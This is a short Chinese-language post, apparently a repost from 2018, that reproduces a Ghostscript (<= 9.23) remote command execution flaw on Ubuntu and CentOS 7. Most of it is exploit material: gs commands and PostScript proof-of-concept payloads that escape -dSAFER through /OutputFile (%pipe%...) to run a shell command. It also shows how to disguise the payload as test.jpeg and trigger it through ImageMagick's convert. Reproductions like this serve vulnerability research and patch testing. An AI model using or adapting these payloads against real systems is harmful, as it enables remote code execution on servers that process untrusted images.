ghostscript 遠程命令執行漏洞復現
阿新 • • 發佈:2018-08-23
dict 依次 tro ict 影響 漏洞 命令執行漏洞 .com put
影響的版本 <= 9.23(全版本、全平臺)
Ubuntu
開啟 ghostscript
sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null
依次輸入
legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%id) currentdevice putdeviceprops showpage
執行結果
poc
%!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%id) currentdevice putdeviceprops
用 vim 將 poc 保存為 test.jpeg,執行
sch01ar@ubuntu:~$ convert test.jpeg 1.jpg
執行結果,1.jpg 隨便寫
Centos 7
開啟 ghostscript
[root@sch01ar ~]# gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null
依次輸入
legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%id) currentdevice putdeviceprops showpage
執行結果
poc
%!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%id) currentdevice putdeviceprops
ghostscript 遠程命令執行漏洞復現